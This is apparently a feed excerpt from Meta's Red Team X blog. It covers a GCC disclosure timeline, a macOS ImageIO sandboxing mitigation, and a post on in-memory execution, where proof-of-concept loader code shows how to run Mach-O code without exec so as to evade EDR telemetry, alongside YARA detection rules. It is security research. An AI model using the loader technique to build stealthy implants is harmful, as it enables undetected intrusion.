  <li>September 12th, 2023: This post, <a href="https://github.com/metaredteam/external-disclosures/security/advisories/GHSA-x7ch-h5rf-w2mf">our disclosure</a>, <a href="https://developer.arm.com/Arm%20Security%20Center/GCC%20Stack%20Protector%20Vulnerability%20AArch64">Arm’s security advisory</a>, <a href="https://www.cve.org/CVERecord?id=CVE-2023-4039">CVE-2023-4039</a>, and <a href="https://gcc.gnu.org/pipermail/gcc-patches/2023-September/630054.html">patches on GCC’s mailing list</a> all go live simultaneously.</li>
</ul>]]></content><author><name>Tom Hebb, Red Team X</name></author><category term="mitigation" /><summary type="html"><![CDATA[]]></summary></entry><entry><title type="html">Sandboxing ImageIO media parsing in macOS</title><link href="https://rtx.meta.security/mitigation/2023/09/11/Sandboxing-ImageIO-in-macOS.html" rel="alternate" type="text/html" title="Sandboxing ImageIO media parsing in macOS" /><published>2023-09-11T00:00:00+00:00</published><updated>2023-09-11T00:00:00+00:00</updated><id>https://rtx.meta.security/mitigation/2023/09/11/Sandboxing-ImageIO-in-macOS</id><content type="html" xml:base="https://rtx.meta.security/mitigation/2023/09/11/Sandboxing-ImageIO-in-macOS.html"><![CDATA[<p>While assessing the potential impact of the latest <a href="https://citizenlab.ca/2023/09/blastpass-nso-group-iphone-zero-click-zero-day-exploit-captured-in-the-wild/">BLASTPASS Zero-Click, Zero-Day Exploit</a> on our Family of Apps, we discovered a feature in ImageIO that moves image parsing to an out-of-process sandbox. This feature mitigates the effects of image parsing vulnerabilities similar to BLASTPASS on macOS. App developers can enable this feature on macOS by setting the <code class="language-plaintext highlighter-rouge">IIOEnableOOP</code> preference to true. Anyone can enable this feature by setting the environment variable <code class="language-plaintext highlighter-rouge">IIOEnableOOP=YES</code> before launching an app. It is not available on iOS.</p>

<h2 id="background">Background</h2>

<p>In light of the BLASTPASS 0-day being <a href="https://gizmodo.com/apple-security-update-pegasus-zero-day-blastpass-1850817040">exploited in the wild</a>, we sought to understand how image parsing was performed on Apple devices.</p>

<p>Apple provides the <code class="language-plaintext highlighter-rouge">CGImage*</code> set of APIs that enable developers to conveniently work with various image formats. Although these APIs have a prefix indicating the CoreGraphics framework, the underlying parser code resides in ImageIO.framework. Developers often don’t use the CoreGraphics APIs directly, instead using UIKit’s <a href="https://developer.apple.com/documentation/uikit/uiimage?language=objc">UIImage</a> class, which wraps the <code class="language-plaintext highlighter-rouge">CGImage*</code> APIs and can be used to easily render an image in a UIKit application.</p>

<p>Information about Apple’s image parsing practices is scarce, with the exception of a <a href="https://googleprojectzero.blogspot.com/2020/04/fuzzing-imageio.html">2020 article by Project Zero</a> which mentioned that some formats like PSD were parsed out-of-process, while the majority were done in-process. Out-of-process sandboxing of media parsers raises attacker costs by requiring a sandbox escape before exploit code can gain access to app data. This is desirable from a defense perspective.</p>

<p>We wanted to understand which media formats were sandboxed out-of-process, if any.</p>

<h2 id="imageioxpcservice">ImageIOXPCService</h2>

<p>According to the Project Zero post, out-of-process image parsing is handled by the ImageIOXPCService service <code class="language-plaintext highlighter-rouge">/System/Library/Frameworks/ImageIO.framework/Versions/A/XPCServices/ImageIOXPCService.xpc/Contents/MacOS/ImageIOXPCService</code>.</p>

<p>Examining its exports, we discovered that it provides the same <code class="language-plaintext highlighter-rouge">CGImage*</code> APIs as ImageIO. A comparison of the decompiled code for these APIs revealed that they are very similar.</p>

<p>Additionally, both ImageIO and XPCService import libraries like libPNG, libJPEG, etc., suggesting that they share the same capabilities to parse these formats. The list of imports for ImageIO (left) and ImageIOXPCService (right) is provided below:</p>

<p><img src="https://rtx.meta.security/assets/images/Sandboxing_ImageIO/symbol_trees.png" alt="&quot;Symbol trees showing ImageIO exports on the left and ImageIOXPCService on the right, listings are identical&quot;" /></p>

<p>The <a href="https://www.internalfb.com/phabricator/paste/view/P815421677">sandbox config</a> for ImageIOXPCService is located at <code class="language-plaintext highlighter-rouge">/System/Library/Sandbox/Profiles/com.apple.ImageIOXPCService.sb</code>.</p>

<p>Tracing XPC calls using <a href="https://newosxbook.com/tools/XPoCe.html">XPoCe</a>, we didn’t see any calls to <code class="language-plaintext highlighter-rouge">com.apple.imageioxpcservice</code>, but we did see telemetry from all the calls to ImageIO APIs, hinting that image parsing was being done in-process. We also did not see the ImageIOXPCService process show up in Activity Monitor, further confirming that no out-of-process parsing was happening.</p>

<p>Despite signs that ImageIO is capable of out-of-process parsing, all of this pointed towards in-process execution being the default.</p>

<h2 id="debugging">Debugging</h2>

<p>At this point we needed clarity and reached for a debugger. A couple of APIs made good starting points:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">CGImageSourceCreateWithData</code> saves the reference to an image buffer, parses the header, and initializes a reader plugin based on the format of the image. The reader plugin is a format-specific plugin that knows how to handle each image format.</li>
  <li><code class="language-plaintext highlighter-rouge">CGImageSourceCreateImageAtIndex</code> lazily parses the image buffer when pixel data is accessed.</li>
</ul>

<p>Stepping through <code class="language-plaintext highlighter-rouge">CGImageSourceCreateWithData</code> we see reader initialization determining the image format.</p>

<p>The following code snippet shows <code class="language-plaintext highlighter-rouge">IIO_ReaderHandler::readerForBytes</code> initializing an XPC client before deciding whether to use an XPC server (out-of-process) or not (in-process) for parsing image header data. This pattern repeats when reader plugins prepare to parse image contents.</p>

<p><img src="https://rtx.meta.security/assets/images/Sandboxing_ImageIO/XPC_decision.png" alt="&quot;Reader plugin initializing an XPC client before deciding whether to use the XPC server or do parsing in-proc&quot;" /></p>

<h2 id="in-proc-or-out-of-proc">In-Proc or Out-of-Proc?</h2>

<p>We have determined that ImageIO is capable of parsing media both in-process and out-of-process. However, the question remains: how does the library decide where to parse an image? There exists a set of functions beginning with “<code class="language-plaintext highlighter-rouge">useServerFor*</code>” which determines whether the library will use a remote XPC server (out-of-process) for a specific task.</p>

<p><img src="https://rtx.meta.security/assets/images/Sandboxing_ImageIO/useServer_funcs.png" alt="&quot;Listing of various useServer* functions that decide whether the sandbox is enabled for different parsing stages&quot;" /></p>

<p>Let’s examine <code class="language-plaintext highlighter-rouge">IIOXPCClient::useServerForIdentification</code>, which determines whether header parsing will be performed locally or in a sandbox. Other <code class="language-plaintext highlighter-rouge">useServerFor*</code> functions are similar:</p>

<p><img src="https://rtx.meta.security/assets/images/Sandboxing_ImageIO/macOS_useServer.png" alt="&quot;Ghidra decompilation of macOS' useServerForIdentification method, which is similar to the other useServer* funcs&quot;" /></p>

<p>In our experience, <code class="language-plaintext highlighter-rouge">param_1</code> is always <code class="language-plaintext highlighter-rouge">0xffffffff</code>, and the deciding factor is the byte at an offset of 0x24. By default, the byte at this offset was set, which caused <code class="language-plaintext highlighter-rouge">useServerForIdentification</code> to return false and kept all parsing in-process on macOS.</p>
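<p>Modeled in C, the decompiled decision reduces to roughly the following toy reconstruction (the struct layout beyond offset 0x24 and every name here are our own labels, not Apple’s):</p>

```c
#include <stdint.h>
#include <stdbool.h>

/* Toy model of the decompiled check. The deciding byte lives at offset
 * 0x24 of the XPC client object; it is set by default on macOS, which
 * keeps parsing in-process. All names here are our own labels. */
struct iio_xpc_client {
    uint8_t unknown[0x24];   /* fields we did not reverse */
    uint8_t stay_in_process; /* the byte at offset 0x24 */
};

bool use_server_for_identification(const struct iio_xpc_client *c) {
    /* byte set (default) -> false -> parse in-process;
     * byte cleared       -> true  -> hand off to ImageIOXPCService */
    return c->stay_in_process == 0;
}
```

<p>Clearing that byte, whether by hand in a debugger or via the preference that initializes it, is what flips parsing out-of-process.</p>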

<h3 id="forcing-out-of-proc">Forcing Out-of-Proc</h3>

<p>Modifying this byte in the debugger forced out-of-process parsing, causing ImageIOXPCService to appear in the Activity Monitor. Success!</p>

<p><img src="https://rtx.meta.security/assets/images/Sandboxing_ImageIO/ActivityMonitor.png" alt="&quot;macOS' Activity Monitor showing the ImageIOXPCService process running, proving ImageIO is sandboxed&quot;" /></p>

<p>Tracing what initialized that byte, we discovered <code class="language-plaintext highlighter-rouge">IIOXPCClient_block_invoke</code>:</p>

<p><img src="https://rtx.meta.security/assets/images/Sandboxing_ImageIO/block_invoke.png" alt="&quot;The block_invoke function's decompilation, showing where the IOPreference is fetched&quot;" /></p>

<p>It sets the value at offset 0x24 into <code class="language-plaintext highlighter-rouge">IIOXPCClientObject</code> based on the <code class="language-plaintext highlighter-rouge">IIOEnableOOP</code> preference. Let’s take a look at how it works:</p>

<p><img src="https://rtx.meta.security/assets/images/Sandboxing_ImageIO/IOPreferencesGetBoolean.png" alt="&quot;IOPreferences GetBoolean internals, decompilation showing how it first looks for an env var then pulls from CFPreferences&quot;" /></p>

<p>First, it checks if an environment variable called <code class="language-plaintext highlighter-rouge">IIOEnableOOP</code> is set. If so, this takes precedence over any other preference. We can test our application by setting <code class="language-plaintext highlighter-rouge">IIOEnableOOP=YES</code> to verify that parsing is now occurring out-of-process.</p>

<p>If the environment variable is not set, it falls back to reading a <a href="https://developer.apple.com/documentation/corefoundation/1515497-cfpreferencescopyappvalue?language=objc">CFPreferences</a> value from an app-specific key-value preference store that our application can write to.</p>

<p>To test this, we can call the following to set that app-specific preference:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CFPreferencesSetAppValue(CFSTR("IIOEnableOOP"), kCFBooleanTrue, kCFPreferencesCurrentApplication);
</code></pre></div></div>

<p>And it works! Now our application is doing OOP sandboxed parsing for all images that use ImageIO APIs. Note that this preference is persistent and will be saved between different application runs.</p>

<h3 id="does-this-work-on-ios">Does this work on iOS?</h3>

<p>Unfortunately, this does not work on iOS. The ImageIOXPCService binary is not present on iOS, and we can see that the <code class="language-plaintext highlighter-rouge">useServerForIdentification</code> function body is <code class="language-plaintext highlighter-rouge">#ifdef</code>’d blank. The <code class="language-plaintext highlighter-rouge">IIOEnableOOP</code> preference has no effect either.</p>

<p><img src="https://rtx.meta.security/assets/images/Sandboxing_ImageIO/iOS_useServer.png" alt="&quot;Decompilation of iOS' useServer* function showing it is an empty stub, not yet implemented&quot;" /></p>

<h4 id="update-as-of-nov-2023-ios-17">Update as of Nov 2023 (iOS 17):</h4>
<p>As of iOS 17, we see this feature show up in the code; however, it is gated behind <code class="language-plaintext highlighter-rouge">IIO_OSAppleInternalBuild()</code>.</p>

<p><img src="https://rtx.meta.security/assets/images/Sandboxing_ImageIO/iOS17_internal_check.png" alt="&quot;Decompilation of iOS 17 showing implementation gated behind apple internal build check&quot;" /></p>

<h2 id="conclusion">Conclusion</h2>

<p>While this is an undocumented feature, setting the <code class="language-plaintext highlighter-rouge">IIOEnableOOP</code> preference to true appears to correctly sandbox ImageIO on macOS and falls back gracefully to in-process parsing on iOS.</p>

<p>The image parsing code in ImageIOXPCService closely resembles the code found in ImageIO itself, and it imports the same libraries used for image parsing.</p>

<p>From our testing on macOS 13.5.1, we have not encountered issues with out-of-process parsing. We have not measured the performance impact, but if your application is not heavily reliant on images, enabling this feature is a meaningful security improvement.</p>]]></content><author><name>Nik Tsytsarkin, Red Team X</name></author><category term="mitigation" /><summary type="html"><![CDATA[]]></summary></entry><entry><title type="html">In-Memory Execution in macOS: the Old and the New</title><link href="https://rtx.meta.security/post-exploitation/2022/12/19/In-Memory-Execution-in-macOS.html" rel="alternate" type="text/html" title="In-Memory Execution in macOS: the Old and the New" /><published>2022-12-19T00:00:00+00:00</published><updated>2022-12-19T00:00:00+00:00</updated><id>https://rtx.meta.security/post-exploitation/2022/12/19/In-Memory-Execution-in-macOS</id><content type="html" xml:base="https://rtx.meta.security/post-exploitation/2022/12/19/In-Memory-Execution-in-macOS.html"><![CDATA[<p>As part of our work, it’s often interesting to try to find possible avenues of attack that bypass detections on EDR products. On macOS, EDR products specifically collect telemetry from fork and exec syscalls. macOS has alternative ways of executing code, which side-step these system calls by executing code directly in-memory.</p>

<p>There are a few APIs that can be used for in-memory execution of code in macOS. The most well known is an API in dyld, <code class="language-plaintext highlighter-rouge">NSCreateObjectFileImageFromMemory</code>, which is heavily documented but has become less effective since it started to leave file artifacts on disk in dyld3. However, there are two more APIs that can still be used for this purpose but aren’t well documented, <code class="language-plaintext highlighter-rouge">NSCreateObjectFileImageFromFile</code> and <code class="language-plaintext highlighter-rouge">CFBundleCreate</code>.</p>

<p>In this writeup, we touch on all 3 aforementioned APIs and then create a PoC loader which uses <code class="language-plaintext highlighter-rouge">NSCreateObjectFileImageFromFile</code> and <code class="language-plaintext highlighter-rouge">CFBundleCreate</code> to load a bundle from disk and execute it.</p>

<h2 id="nscreateobjectfileimagefrommemory">NSCreateObjectFileImageFromMemory</h2>

<p>Use of <code class="language-plaintext highlighter-rouge">NSCreateObjectFileImageFromMemory</code> and <code class="language-plaintext highlighter-rouge">NSLinkModule</code> has been documented several times in the past <a href="https://malwareunicorn.org/workshops/macos_dylib_injection.html#5">[1]</a>, <a href="https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf">[2]</a>. These functions in the dylib loader allow us to execute something straight from memory.</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">NSCreateObjectFileImageFromMemory</code> is able to load a Mach-O from memory.</li>
  <li><code class="language-plaintext highlighter-rouge">NSLinkModule</code> adds the loaded dylib’s memory to the current process’s address space. It does the linking work for a loader built on the <code class="language-plaintext highlighter-rouge">NSCreateObjectFileImageFromMemory</code> API.</li>
</ul>

<p><code class="language-plaintext highlighter-rouge">NSCreateObjectFileImageFromMemory</code> has also been abused several times in the <a href="https://objective-see.com/blog/blog_0x51.html">past</a>.</p>

<h3 id="recent-changes">Recent Changes</h3>

<p>Starting with dyld3, Apple has changed the <code class="language-plaintext highlighter-rouge">NSLinkModule</code> function to stop doing in-memory loading directly. Now, if a program attempts to load something in-memory, it is written to disk with a string fingerprint <code class="language-plaintext highlighter-rouge">NSCreateObjectFileImageFromMemory-XXXXXXXX</code> as shown in the <a href="https://github.com/apple-oss-distributions/dyld/blob/3f24a36068a96722cf3acbd5087983ce658e9d70/dyld3/APIs_macOS.cpp#L154">following excerpt.</a></p>

<pre><code class="language-C++">NSModule NSLinkModule(NSObjectFileImage ofi, const char* moduleName, uint32_t options)
{
    DYLD_LOAD_LOCK_THIS_BLOCK
    log_apis("NSLinkModule(%p, \"%s\", 0x%08X)\n", ofi, moduleName, options);

    __block const char* path = nullptr;
    bool foundImage = gAllImages.forNSObjectFileImage(ofi, ^(OFIInfo &amp;image) {
        // if this is memory based image, write to temp file, then use file based loading
        if ( image.memSource != nullptr ) {
            // make temp file with content of memory buffer
            image.path = nullptr;
            char tempFileName[PATH_MAX];
            const char* tmpDir = getenv("TMPDIR");
            if ( (tmpDir != nullptr) &amp;&amp; (strlen(tmpDir) &gt; 2) ) {
                strlcpy(tempFileName, tmpDir, PATH_MAX);
                if ( tmpDir[strlen(tmpDir)-1] != '/' )
                    strlcat(tempFileName, "/", PATH_MAX);
            }
            else
                strlcpy(tempFileName,"/tmp/", PATH_MAX);
            strlcat(tempFileName, "NSCreateObjectFileImageFromMemory-XXXXXXXX", PATH_MAX);
...
</code></pre>

<p>This new behavior essentially means that the “in-memory” execution nature of this API is deprecated, and usage of this API is now detectable.</p>

<h3 id="attacker-hat-on">Attacker Hat on</h3>

<p>This API now leaves a trace on the system, and is therefore less suitable to use as a capability in malware.</p>

<h3 id="defender-hat-on">Defender Hat on</h3>

<p>In dyld3, the usage of this API is quite easily detectable: from any EDR agent, all we have to do is look for file modifications whose paths contain the string <code class="language-plaintext highlighter-rouge">NSCreateObjectFileImageFromMemory</code>.</p>
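<p>A sketch of that check in C, polling a directory listing for illustration (a real EDR would subscribe to file-creation events rather than poll, and the temp-directory location is an assumption):</p>

```c
#include <dirent.h>
#include <stdio.h>
#include <string.h>

/* Count directory entries bearing the artifact prefix that dyld3's
 * NSLinkModule writes out for "memory-based" images. Returns the number
 * of matches, or -1 if the directory can't be opened. */
int count_nslinkmodule_artifacts(const char *dir_path) {
    DIR *dir = opendir(dir_path);
    if (dir == NULL)
        return -1;
    int hits = 0;
    struct dirent *entry;
    while ((entry = readdir(dir)) != NULL)
        if (strstr(entry->d_name, "NSCreateObjectFileImageFromMemory-") != NULL)
            hits++;
    closedir(dir);
    return hits;
}
```

<p>Scanning <code class="language-plaintext highlighter-rouge">$TMPDIR</code> and <code class="language-plaintext highlighter-rouge">/tmp</code> (the two locations the dyld3 excerpt above writes to) would cover the default behavior.</p>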

<p>I’d thought about detecting this API before the dyld3 changes and came up with the following.</p>

<p>In-memory execution is quite hard to detect without memory forensic signals. Apple has removed kernel extensions, and hence essentially gotten rid of memory dumps in a macOS system. Volexity suggests they have a workaround for this, but it involves allowlisting the kext that they inject into memory. The other way to detect this would be to use YARA signatures in order to find and match function signatures on the loader binary, and chain them together in a sequence.</p>

<p>I wrote up a YARA signature which is fairly successful at detecting this behavior. This signature looks for byte patterns that match <code class="language-plaintext highlighter-rouge">LC_MAIN</code>, and invocations of <code class="language-plaintext highlighter-rouge">NSLinkModule</code> and <code class="language-plaintext highlighter-rouge">NSCreateObjectFileImageFromMemory</code> in a binary. Here, <code class="language-plaintext highlighter-rouge">sig_for_mach_o</code> refers to a YARA signature similar to <a href="https://github.com/airbnb/binaryalert/blob/master/rules/public/MachO.yara">this one</a>.</p>

<pre><code class="language-Yara">rule memory_loading_and_execution: in_memory_loader{
  meta:
    author = "r34p3r@meta.com"
    share_level = "GREEN"
    description = "Possible in-memory loading and execution of Mach-O Seen in OSX/Evilquest"
  strings:
    $bad_LC_MAIN_jmp = {
      81 ?? 28 00 00 80
      0F 8? ?? ?? ?? ??
    }
    $map_args_to_nslinkmodule = {
        48 ?? (?? ?? | ?? ?? ?? ?? ??)
        48 ?? (?? ?? | ?? ?? ?? ?? ??)
        [0-32]
        BA 03 00 00 00
        [0-32]
        (ff | E8) ?? ?? ?? ??
    }
    $map_args_to_nscreate = {
        48 ?? ?? ?? ?? 00 00
        48 ?? ??
        48 ?? ?? ?? ?? 00 00
        B? (?? | ?? ?? ?? ??)
        [0-32]
        E8 ?? ?? 00 00
    }

  condition:
    {sig_for_mach_o} and $map_args_to_nslinkmodule and $bad_LC_MAIN_jmp and $map_args_to_nscreate
}
</code></pre>

<h2 id="nscreateobjectfileimagefromfile">NSCreateObjectFileImageFromFile</h2>

<p>While going through the dyld APIs, I noticed that there was another API, <code class="language-plaintext highlighter-rouge">NSCreateObjectFileImageFromFile</code>, which had a similar function signature to <code class="language-plaintext highlighter-rouge">NSCreateObjectFileImageFromMemory</code>. This API is a sibling of <code class="language-plaintext highlighter-rouge">NSCreateObjectFileImageFromMemory</code>, and is able to work with any file on disk.</p>

<h3 id="why-use-nscreateobjectfileimagefromfile">Why use NSCreateObjectFileImageFromFile?</h3>

<p>Let’s abstract out the requirements of a good loader for a second and look at them from a high level. In a good loader:</p>

<ul>
  <li>We want to leave no footprint on disk, except perhaps the loader.</li>
  <li>We want to execute things in a way that avoids detection.</li>
</ul>

<p>The <code class="language-plaintext highlighter-rouge">NSCreateObjectFileImageFromMemory</code> API mentioned above could have been used to execute arbitrary downloaded files in-memory. But do we really need arbitrary executables when the operating system has a lot of <em>Apple-signed lolbins</em>?</p>

<p>This API allows you to load any arbitrary Mach-O from disk, and could form an integral piece of an implant.</p>

<h3 id="internals">Internals</h3>

<pre><code class="language-C++">// macOS needs to support an old API that only works only
// with fileype==MH_BUNDLE.
NSObjectFileImageReturnCode NSCreateObjectFileImageFromFile(const char* path, NSObjectFileImage* ofi)
{
    log_apis("NSCreateObjectFileImageFromFile(\"%s\", %p)\n", path, ofi);

    // verify path exists
    struct stat statbuf;
    if ( dyld3::stat(path, &amp;statbuf) == -1 )
        return NSObjectFileImageFailure;

    // create ofi that just contains path. NSLinkModule does all the work
    OFIInfo result;
    result.path        = strdup(path);
    result.memSource   = nullptr;
    result.memLength   = 0;
    result.loadAddress = nullptr;
    result.imageNum    = 0;
    *ofi = gAllImages.addNSObjectFileImage(result);

    log_apis("NSCreateObjectFileImageFromFile() =&gt; %p\n", *ofi);

    return NSObjectFileImageSuccess;
}
</code></pre>

<p>This API is fairly straightforward. While Apple does warn that this API can only be used with bundles, it’s possible to iterate through a mapped image and find the offset of <code class="language-plaintext highlighter-rouge">LC_MAIN</code> so that we can call the main function of a mapped executable.</p>

<pre><code class="language-C++">int find_macho(unsigned long addr, unsigned long *base, unsigned int increment, unsigned int dereference) {
    unsigned long ptr;
    // find a Mach-O header by searching from address
    *base = 0;

    while(1) {
        ptr = addr;
        if(dereference) ptr = *(unsigned long *)ptr;
        chmod((char *)ptr, 0777);
        if(errno == 2 /*ENOENT*/ &amp;&amp;
            ((int *)ptr)[0] == 0xfeedfacf /*MH_MAGIC_64*/) {
            *base = ptr;
            return 0;
        }

        addr += increment;
    }
    return 1;
}


int find_epc(unsigned long base, struct entry_point_command **entry) {
    // find the entry point command by searching through base's load commands

    struct mach_header_64 *mh;
    struct load_command *lc;

    *entry = NULL;

    mh = (struct mach_header_64 *)base;
    lc = (struct load_command *)(base + sizeof(struct mach_header_64));
    for(int i=0; i&lt;mh-&gt;ncmds; i++) {
        if(lc-&gt;cmd == LC_MAIN) {    //0x80000028
            *entry = (struct entry_point_command *)lc;
            return 0;
        }

        lc = (struct load_command *)((unsigned long)lc + lc-&gt;cmdsize);
    }

    return 1;
}
</code></pre>

<p>Hence, this API can be used to load both bundles and Mach-O executables.</p>

<h3 id="attacker-hat-on-1">Attacker Hat on</h3>

<p>From an attacker’s standpoint, it’s possible to create a backdoor of sorts that takes a Mach-O that already exists locally and executes it without the “exec” syscall, making the execution invisible to most EDRs. The following sequence of API calls accomplishes it:</p>

<pre><code class="language-ObjC">dyldErr = NSCreateObjectFileImageFromFile(
    codePath,
    &amp;ofi
);
module = NSLinkModule(ofi, moduleName, options);
symbol = NSLookupSymbolInModule(module, "_" kBundleEntryPointName);
function = NSAddressOfSymbol(symbol);
function(message);
</code></pre>

<p>It provides all the benefits that <code class="language-plaintext highlighter-rouge">NSCreateObjectFileImageFromMemory</code> used to provide, without writing any new file artifacts to disk, and it avoids <code class="language-plaintext highlighter-rouge">exec</code> entirely. That makes it an ideal API to use in an executable loader implant on macOS.</p>

<h3 id="defender-hat-on-1">Defender Hat on</h3>

<p>The detection challenges here exactly mirror those for <code class="language-plaintext highlighter-rouge">NSCreateObjectFileImageFromMemory</code>. A YARA signature could be our best bet at detecting this API inside a Mach-O loader:</p>

<pre><code class="language-Yara">rule memory_loading_and_execution_using_fileimagefromfile: mac_os in_memory_loader_using_fileimagefromfile{
  meta:
    author = "r34p3r@meta.com"
    share_level = "GREEN"
    description = "Possible in-memory loading and execution of Mach-O"

  strings:
    $call_to_LC_MAIN_jmp = {
      81 ?? 28 00 00 80
      0F 8? ?? ?? ?? ??
    }
    $ns_link_module = "NSLinkModule"
    $ns_create_image_from_file = "NSCreateObjectFileImageFromFile"
    $call_to_nslookup_for_symbols = "NSLookupSymbolInModule"
    $call_to_ns_address_of_symbol = "NSAddressOfSymbol"
    $map_args_to_nslinkmodule = {
        48 ?? ?? ?? ?? ff ff
        4C ?? ??
        [0-32]
        BA (03| 07) 00 00 00
        [0-32]
        E8 ?? ?? ?? ??
    }
  condition:
    {sig_for_mach_o} and $ns_create_image_from_file and ($ns_link_module and $map_args_to_nslinkmodule) and 2 of ($call_to_*)
}
</code></pre>

<p>This YARA signature looks for byte patterns of <code class="language-plaintext highlighter-rouge">LC_MAIN</code> comparisons, plus invocation signatures of <code class="language-plaintext highlighter-rouge">NSCreateObjectFileImageFromFile</code>, <code class="language-plaintext highlighter-rouge">NSLinkModule</code>, <code class="language-plaintext highlighter-rouge">NSLookupSymbolInModule</code> and <code class="language-plaintext highlighter-rouge">NSAddressOfSymbol</code> to detect whether this method of invocation is being used in an executable.</p>

<h2 id="cfbundlecreate">CFBundleCreate</h2>

<p>Apple’s documentation about the third API is a bit sparse.</p>

<p><img src="https://rtx.meta.security/assets/images/In_Memory_macOS/CFBundleCreate.png" alt="&quot;Apple's complete public documentation on CFBundleCreate&quot;" /></p>

<p>This API essentially mimics what <code class="language-plaintext highlighter-rouge">NSCreateObjectFileImageFromFile</code> does. The following sequence of API calls produces the same loading behavior:</p>

<pre><code class="language-ObjC">url = CFURLCreateFromFileSystemRepresentation(NULL, (const UInt8 *) pathToBundle, strlen(pathToBundle), true);
bundle = CFBundleCreate(NULL, url);
func = (EntryPoint) CFBundleGetFunctionPointerForName(bundle, CFSTR(kBundleEntryPointName));
func("... from CFBundle");
</code></pre>

<h2 id="pre-requisite-entitlements">Pre-requisite Entitlements</h2>

<p>Apple has introduced protections around how executable memory permissions are handled, which means a couple of entitlements are required to get in-memory execution working.</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>manishbhatt@jvf-imac Development % codesign <span class="nt">-d</span> <span class="nt">--entitlements</span> - ./loader
<span class="o">[</span>Dict]
    <span class="o">[</span>Key] com.apple.security.cs.allow-unsigned-executable-memory
    <span class="o">[</span>Value]
        <span class="o">[</span>Bool] <span class="nb">true</span>
    <span class="o">[</span>Key] com.apple.security.cs.disable-executable-page-protection
    <span class="o">[</span>Value]
        <span class="o">[</span>Bool] <span class="nb">true</span>
    <span class="o">[</span>Key] com.apple.security.cs.disable-library-validation
    <span class="o">[</span>Value]
        <span class="o">[</span>Bool] <span class="nb">true</span>
</code></pre></div></div>

<p>These entitlements are not restricted. Anyone with a developer certificate can attach them to their application.</p>
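<p>To reproduce such a build, one would list the entitlements in a plist and pass it to <code class="language-plaintext highlighter-rouge">codesign</code>. A sketch, assuming a hypothetical <code class="language-plaintext highlighter-rouge">loader.entitlements</code> file and a valid signing identity:</p>

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>com.apple.security.cs.allow-unsigned-executable-memory</key>
    <true/>
    <key>com.apple.security.cs.disable-executable-page-protection</key>
    <true/>
    <key>com.apple.security.cs.disable-library-validation</key>
    <true/>
</dict>
</plist>
```

<p>Signing would then look something like <code class="language-plaintext highlighter-rouge">codesign -s "Developer ID Application" --entitlements loader.entitlements ./loader</code>.</p>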

<h2 id="putting-it-together-in-a-single-mach-o">Putting it together in a single Mach-O</h2>

<p>The PoC consists of two pieces: an innocuous-looking bundle, and a Mach-O executable that uses <code class="language-plaintext highlighter-rouge">NSCreateObjectFileImageFromFile</code> and <code class="language-plaintext highlighter-rouge">CFBundleCreate</code> to load the bundle directly from disk. The loader then resolves and calls the bundle’s <code class="language-plaintext highlighter-rouge">HelloWorld</code> function.</p>

<h3 id="bundle-source-code">Bundle Source Code</h3>

<pre><code class="language-ObjC">#include &lt;stdio.h&gt;

extern void HelloWorld(const char *message);

extern void HelloWorld(const char *message)
{
    fprintf(stderr, "Hello World!\n");
    fprintf(stderr, "%s\n", message);
}
</code></pre>

<h3 id="loader-that-loads-bundles-from-disk">Loader that Loads Bundles from Disk</h3>

<pre><code class="language-ObjC">#include &lt;CoreServices/CoreServices.h&gt;
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;fcntl.h&gt;
#include &lt;unistd.h&gt;
#include &lt;sys/mman.h&gt;
#include &lt;mach/mach.h&gt;
#include &lt;mach-o/arch.h&gt;
#include &lt;mach-o/fat.h&gt;
#include &lt;mach-o/dyld.h&gt;

// Definitions for the bundle entry point.

#define kBundleEntryPointName "HelloWorld"
typedef void( * EntryPoint)(const char * message);

/////////////////////////////////////////////////////////////////

static void cf_load_bundle(const char * pathToBundle)
// Load and call the bundle the easy way, via CFBundle.
{
  CFURLRef u;
  CFBundleRef b;
  EntryPoint f;

  u = NULL;
  b = NULL;

  u = CFURLCreateFromFileSystemRepresentation(NULL, (const UInt8 * ) pathToBundle, strlen(pathToBundle), true);
  if (u == NULL) {
    fprintf(stderr, "Could not create URL.\n");
  } else {
    b = CFBundleCreate(NULL, u);
    if (b == NULL) {
      fprintf(stderr, "Could not create bundle.\n");
    } else {
      f = (EntryPoint) CFBundleGetFunctionPointerForName(b, CFSTR(kBundleEntryPointName));
      if (f == NULL) {
        fprintf(stderr, "Could not get entry point.\n");
      } else {
        f("... from CFBundle");
      }
    }
  }

  if (b != NULL) {
    CFRelease(b);
  }
  if (u != NULL) {
    CFRelease(u);
  }
}

static Boolean GetBundleExecutable(const char * pathToBundle, char * buf, size_t bufLen)
// Get the executable path for the specified bundle.  We do this using
// CFBundle APIs to avoid having to hard-code things like "Contents/macOS".
{
  Boolean ok;
  CFURLRef u;
  CFBundleRef b;
  CFURLRef u2;

  u = NULL;
  b = NULL;
  u2 = NULL;

  // Create a bundle from the path.

  ok = true;
  u = CFURLCreateFromFileSystemRepresentation(NULL, (const UInt8 * ) pathToBundle, strlen(pathToBundle), true);
  if (u == NULL) {
    ok = false;
  }
  if (ok) {
    b = CFBundleCreate(NULL, u);
    if (b == NULL) {
      ok = false;
    }
  }

  // Ask the bundle for the path to the executable.

  if (ok) {
    u2 = CFBundleCopyExecutableURL(b);
    if (u2 == NULL) {
      ok = false;
    }
  }
  if (ok) {
    ok = CFURLGetFileSystemRepresentation(u2, true, (UInt8 * ) buf, bufLen);
  }

  // Clean up.

  if (u != NULL) {
    CFRelease(u);
  }
  if (b != NULL) {
    CFRelease(b);
  }
  if (u2 != NULL) {
    CFRelease(u2);
  }
  return ok;
}

static void nsfromfile_load_bundle(const char * pathToBundle) {
  int junk;
  char codePath[1024];
  void * codeAddr;
  size_t codeSize;
  const char * moduleName;
  const char * message;
  NSObjectFileImageReturnCode dyldErr;
  NSObjectFileImage ofi;
  enum DYLD_BOOL ok;
  NSModule m;
  NSSymbol s;
  EntryPoint f;

  codeAddr = NULL;
  ofi = NULL;
  m = NULL;

  // Get the path to the code within the bundle.

  ok = GetBundleExecutable(pathToBundle, codePath, sizeof(codePath));
  if (!ok) {
